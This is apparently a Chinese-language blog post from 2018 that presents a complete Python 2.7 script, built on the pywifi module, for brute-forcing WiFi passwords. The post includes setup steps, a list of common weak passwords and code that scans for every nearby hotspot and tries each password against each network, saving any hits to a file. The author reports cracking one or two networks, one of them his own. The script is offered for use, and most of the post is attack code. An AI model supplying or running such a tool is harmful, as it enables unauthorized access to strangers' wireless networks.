美文网首页Python新世界python热爱者
一个非常简单易懂的WIFI密码爆破python脚本

一个非常简单易懂的WIFI密码爆破python脚本

作者: 48e0a32026ae | 来源:发表于2018-11-16 15:33 被阅读2次

    环境准备

    python2.7

    凑合的linux

    差不多的无线网卡

    pywifi模块

    弱口令字典

    清除系统中的任何wifi连接记录(非常重要!!!)

    首先,这个模块在win下有点鸡肋,作者在调用WLANAPI时没有做好WLAN_SECURITY_ATTRIBUTES的封装,所以推荐在linux下跑,我测试所使用的是Kali 2.0 自带python 2.7.6 ,可直接通过 pip install pywifi 安装。

    导入模块

    这里用的模块就这三个 pywifi的_wifiutil_linux.py脚本的 _send_cmd_to_wpas方法中的if reply != b'OK ':判断需要修改,不然会有很多的提示信息。

    from pywifi import *

    import time

    import sys

    字典准备

    效率很重要,毕竟这东西跑起来可真慢,下面是天朝用的比较多的wifi弱口令TOP10

    12345678

    123456789

    88888888

    1234567890

    00000000

    87654321

    66668888

    11223344

    147258369

    11111111

    配置扫描器

    推荐扫描时常可以设置在15-20秒之间 测试时常则可以自定义,考虑到认证速度于距离的关系,我一般设置在15左右,再久的也没意义 到时候就算破解成功的热点,信号也好不到哪里

    def main():

    #扫描时常

    scantimes = 3

    #单个密码测试延迟

    testtimes = 15

    output = sys.stdout

    #结果文件保存路径

    files = "TestRes.txt"

    #字典列表

    keys = open(sys.argv[1],"r").readlines()

    print "|KEYS %s"%(len(keys))

    #实例化一个pywifi对象

    wifi = PyWiFi()

    #选择定一个网卡并赋值于iface

    iface = wifi.interfaces()[0]

    #通过iface进行一个时常为scantimes的扫描并获取附近的热点基础配置

    scanres = scans(iface,scantimes)

    #统计附近被发现的热点数量

    nums = len(scanres)

    print "|SCAN GET %s"%(nums)

    print "%s %-*s| %-*s| %-*s| %-*s | %-*s | %-*s %*s %s"%("-"*70,6,"WIFIID",18,"SSID OR BSSID",2,"N",4,"time",7,"signal",10,"KEYNUM",10,"KEY","="*70)

    #将每一个热点信息逐一进行测试

    for i,x in enumerate(scanres):

    #测试完毕后,成功的结果讲存储到files中

    res = test(nums-i,iface,x,keys,output,testtimes)

    if res:

    open(files,"a").write(res)

    扫描周围热点

    def scans(face,timeout):

    #开始扫描

    face.scan()

    time.sleep(timeout)

    #在若干秒后获取扫描结果

    return face.scan_results()

    热点测试

    这里后续推荐将扫描过程数据入库,防止重复扫描,且更加直观。

    def test(i,face,x,key,stu,ts):

    #显示对应网络名称,考虑到部分中文名啧显示bssid

    showID = x.bssid if len(x.ssid)>len(x.bssid) else x.ssid

    #迭代字典并进行爆破

    for n,k in enumerate(key):

    x.key = k.strip()

    #移除所有热点配置

    face.remove_all_network_profiles()

    #讲封装好的目标尝试连接

    face.connect(face.add_network_profile(x))

    #初始化状态码,考虑到用0会发生些逻辑错误

    code = 10

    t1 = time.time()

    #循环刷新状态,如果置为0则密码错误,如超时则进行下一个

    while code!=0 :

    time.sleep(0.1)

    code = face.status()

    now = time.time()-t1

    if now>ts:

    break

    stu.write("%-*s| %-*s| %s |%*.2fs| %-*s | %-*s %*s"%(6,i,18,showID,code,5,now,7,x.signal,10,len(key)-n,10,k.replace("","")))

    stu.flush()

    if code == 4:

    face.disconnect()

    return "%-*s| %s | %*s |%*s"%(20,x.ssid,x.bssid,3,x.signal,15,k)

    return False

    案例

    这里显示本次测试使用了11个弱口令,并扫描到了20个热点,然后开始坑爹的跑起来了

    WIFIID 热点的id号 每跑一个会减1

    SSID OR BSSID 热点的ssid名或mac地址

    N 对热点的连接状态,这个在

    time 当前所花去的时间

    signal 热点的信号强度,若小越好

    KEYNUM 测试密码的id 每跑一个会减1

    KEY 当前测试的密码

    结果还不错,各位的安全意识不像以前那么蛋疼了,扫出一两个,其中一个还是自家的 - -

    相关文章

      网友评论

        本文标题:一个非常简单易懂的WIFI密码爆破python脚本

        本文链接:https://www.haomeiwen.com/subject/reumfqtx.html